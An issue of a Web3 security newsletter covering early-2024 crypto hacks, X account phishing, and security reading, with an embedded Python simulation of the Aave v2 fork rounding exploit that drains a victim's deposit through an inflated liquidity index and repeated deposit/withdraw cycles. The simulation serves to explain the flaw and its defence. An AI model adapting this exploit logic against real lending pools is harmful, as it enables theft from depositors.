BlockThreat - Week 1, 2024
CertiK | CoinsPaid | Gamma | Radiant | Channels | LootDAO
We begin our year with a mass X compromise of government, crypto, and even security companies’ accounts to spread crypto drainers.
PSA: Ongoing phishing campaign in which fake journalists direct victims to a Calendly look-alike phishing site built to hijack X account permissions.
More than $18M was stolen this week across four incidents. CoinsPaid suffered the largest loss, $7.5M, in yet another hot wallet compromise. Two protocols lost a combined $4.75M to the well-known rounding issue in newly deployed pools with negligible liquidity, which many Aave v2 forks fail to defend against. Gamma suffered a $6.18M price manipulation exploit due to insufficient price change controls.
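The rounding issue behind the two Aave v2 fork losses comes from WadRayMath rounding scaled aToken balances half-up against the liquidity index: if a flash loan premium is cumulated into a reserve whose aToken supply is tiny, the index multiplies by roughly (1 + premium / totalSupply), after which each scaled unit is worth a huge amount of underlying and a deposit/withdraw cycle can round in the depositor's favour. The Python model below is an added example, not code from BlockThreat, Aave, or either affected protocol: it reimplements the Aave v2 rayMul, rayDiv and cumulateToLiquidityIndex arithmetic and the mint/burn rounding of the aToken, with interest accrual ignored. The reserve state, the 1 wei deposit, the 900-token premium, the "victim" deposit and the cycle count are all constructed for illustration, and the block does not reproduce any real transaction sequence.

```python
RAY = 10**27
HALF_RAY = RAY // 2
WAD_RAY_RATIO = 10**9          # wadToRay() multiplies by 1e9
FLASHLOAN_PREMIUM_BPS = 9      # Aave v2 default flash loan premium, 0.09%


def ray_mul(a: int, b: int) -> int:
    """Aave v2 WadRayMath.rayMul: (a*b + halfRAY) / RAY, rounding half up."""
    if a == 0 or b == 0:
        return 0
    return (a * b + HALF_RAY) // RAY


def ray_div(a: int, b: int) -> int:
    """Aave v2 WadRayMath.rayDiv: (a*RAY + b/2) / b, rounding half up."""
    assert b != 0, "MATH_DIVISION_BY_ZERO"
    return (a * RAY + b // 2) // b


class Reserve:
    """Minimal model of one Aave v2 reserve and its aToken (interest ignored)."""

    def __init__(self) -> None:
        self.liquidity_index = RAY   # 1.0 in ray
        self.scaled = {}             # user -> scaled aToken balance
        self.liquidity = 0           # underlying actually held by the aToken

    def total_supply(self) -> int:
        return ray_mul(sum(self.scaled.values()), self.liquidity_index)

    def balance_of(self, user: str) -> int:
        return ray_mul(self.scaled.get(user, 0), self.liquidity_index)

    def deposit(self, user: str, amount: int) -> int:
        scaled = ray_div(amount, self.liquidity_index)        # AToken.mint
        assert scaled != 0, "CT_INVALID_MINT_AMOUNT"
        self.scaled[user] = self.scaled.get(user, 0) + scaled
        self.liquidity += amount
        return scaled

    def withdraw(self, user: str, amount: int) -> int:
        scaled = ray_div(amount, self.liquidity_index)        # AToken.burn
        assert scaled != 0, "CT_INVALID_BURN_AMOUNT"
        assert self.scaled.get(user, 0) >= scaled, "not enough aTokens"
        assert self.liquidity >= amount, "not enough liquidity"
        self.scaled[user] -= scaled
        self.liquidity -= amount
        return scaled

    def cumulate_premium(self, premium: int) -> None:
        """ReserveLogic.cumulateToLiquidityIndex as called after a flash loan:
        index *= 1 + premium / aToken.totalSupply(). A tiny supply makes the
        multiplier enormous."""
        ratio = ray_div(premium * WAD_RAY_RATIO, self.total_supply() * WAD_RAY_RATIO)
        self.liquidity_index = ray_mul(ratio + RAY, self.liquidity_index)
        self.liquidity += premium


def rounding_cycle(reserve: Reserve, user: str) -> int:
    """Deposit the smallest amount whose rayDiv rounds UP to one scaled unit,
    then withdraw what that unit is worth. Returns the net gain in wei, which
    is paid out of liquidity belonging to the other depositors."""
    index = reserve.liquidity_index
    deposit = (index - index // 2 + RAY - 1) // RAY   # ceil((index - index/2) / RAY)
    assert reserve.deposit(user, deposit) == 1
    payout = ray_mul(1, index)
    assert reserve.withdraw(user, payout) == 1
    return payout - deposit


def run_scenario(seed_liquidity: int, cycles: int = 20) -> dict:
    """Constructed scenario: a reserve that is either empty or seeded with
    `seed_liquidity` wei by the deployer, a 1 wei attacker deposit, a 900-token
    premium cumulated into the index, a 10,000-token victim deposit, then
    `cycles` rounding cycles from a fresh address."""
    r = Reserve()
    if seed_liquidity:
        r.deposit("treasury", seed_liquidity)
    r.deposit("attacker", 1)
    premium = 1_000_000 * 10**18 * FLASHLOAN_PREMIUM_BPS // 10_000   # 9e20 wei
    r.cumulate_premium(premium)
    victim_deposit = 10_000 * 10**18
    r.deposit("victim", victim_deposit)
    profits = [rounding_cycle(r, "sybil") for _ in range(cycles)]
    victim_balance = r.balance_of("victim")
    return {
        "liquidity_index": r.liquidity_index,
        "profit_per_cycle": profits[0],
        "attacker_profit": sum(profits),
        "victim_balance": victim_balance,
        "victim_rounding_loss": victim_deposit - victim_balance,
        "victim_can_withdraw": r.liquidity >= victim_balance,
    }


if __name__ == "__main__":
    for seed in (0, 1_000_000 * 10**18):
        res = run_scenario(seed)
        print(f"seed={seed}: index={res['liquidity_index'] / RAY:.6g}x, "
              f"gain/cycle={res['profit_per_cycle']}, "
              f"attacker profit={res['attacker_profit']}, "
              f"victim can withdraw={res['victim_can_withdraw']}")
```

With an empty reserve the 900-token premium lands on a 1 wei supply and the index jumps to about 9e20x, so every scaled unit is worth 900 tokens and each cycle nets 450 tokens; twenty cycles remove 9,000 tokens and leave the victim unable to withdraw. With the same premium on a reserve seeded with 1M tokens the index moves by 0.09%, a scaled unit is still worth about 1 wei, and the cycle gains nothing. That is the defence the fix-ups in Aave v2 forks come down to: never let a reserve go live with a negligible aToken supply (seed it before enabling deposits and flash loans), and treat any jump of the liquidity index beyond a sane bound as an incident.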
To gain access to comprehensive vulnerability write-ups, post-mortems, exploit proof of concepts (PoCs), attacker addresses, and additional data regarding this week’s compromises, please subscribe to the premium plan below.
Let’s dive into the news!
Hack3d: The Web3 Security Report 2023 by CertiK.
Annual Web3 Security Report 2023 by QuillAudits.
Reports of an ongoing LFG phishing attack using Solana-based drainers. One victim reported losing $125K.
AragonDAO lost $800K in a fake airdrop phishing attack.
CertiK's X account was phished via the malicious Calendly-style link described above.
Mandiant's X account was hacked by a crypto drainer-as-a-service gang. The attackers used Mandiant's account to post a link to a Phantom wallet phishing site.
Three New Malicious PyPI Packages Deploy CoinMiner on Linux Devices by Gabby Xiong (Fortinet).
Uniswap V4: Oracle hook with malicious owner by Damian Rusinek (Composable Security).
Echidna: Invariant Tests for AMM Contracts by Bloqarl.
A Guide to Crafting Robust Invariants by Chirag Agrawal and Antonio Viggiano.
Notes on Solidity with highlights of security caveats by Chinmay Farkya.
Tag, you’re it: Signal tagging in Circom by Tjaden Hess (Trail of Bits).
zkEVM Bootcamp homework and notes by ustas.eth.
Enjoy reading BlockThreat? Consider sponsoring the next edition or becoming a paid subscriber to unlock the premium section with detailed information on hacks, vulnerabilities, indicators, special reports, and searchable newsletter archives.